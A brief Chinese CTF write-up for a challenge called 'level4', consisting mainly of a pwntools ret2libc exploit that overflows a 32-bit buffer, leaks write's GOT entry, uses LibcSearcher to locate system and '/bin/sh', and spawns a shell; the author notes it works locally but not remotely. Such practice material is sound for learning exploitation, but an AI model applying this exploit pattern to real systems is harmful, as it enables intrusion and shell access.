

程序里没有现成可用的东西,只有一个 write:用它泄露函数的真实地址,再据此查找 libc 版本。
from pwn import *
from LibcSearcher import *
# 32-bit Linux target; log_level="debug" makes pwntools print every byte
# sent and received, which is useful for checking the leak.
context(os="linux", arch="i386", log_level="debug")

p = process("./level4")
# p = remote("node4.buuoj.cn", 25077)
elf = ELF("./level4")

# Addresses are read straight from the ELF and used as absolute values.
# NOTE(review): that only holds for a non-PIE binary, and the overflow below
# presumably relies on there being no stack canary -- confirm with checksec.
write_got = elf.got["write"]
write_plt = elf.plt["write"]
main_addr = elf.symbols["main"]

# Filler up to the saved return address.
# NOTE(review): 0x88 + 4 looks like the buffer size plus the saved frame
# pointer -- confirm against the disassembly.
padding = b"a" * (0x88 + 4)

# Stage 1: return into write@plt so it prints 4 bytes of write's GOT entry
# on fd 1, then resume at main so the program can take input again.
leak_words = (write_plt, main_addr, 1, write_got, 4)
leak_payload = padding + b"".join(map(p32, leak_words))
p.sendline(leak_payload)

leaked = p.recv(4)
write_addr = u32(leaked)
print("write_addr:", hex(write_addr))

# Stage 2: identify the libc build from the leaked address and derive the
# runtime addresses from its symbol offsets.
# NOTE(review): the lookup is only as good as the LibcSearcher database, and
# the libc it matches here is the one loaded by the local process.
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")

# Same overflow again: call system with the "/bin/sh" string found in libc;
# main_addr fills the return-address slot.
shell_words = (system_addr, main_addr, binsh_addr)
shell_payload = padding + b"".join(map(p32, shell_words))
p.sendline(shell_payload)

p.interactive()
结果:本地可以打通,远程没有打通。
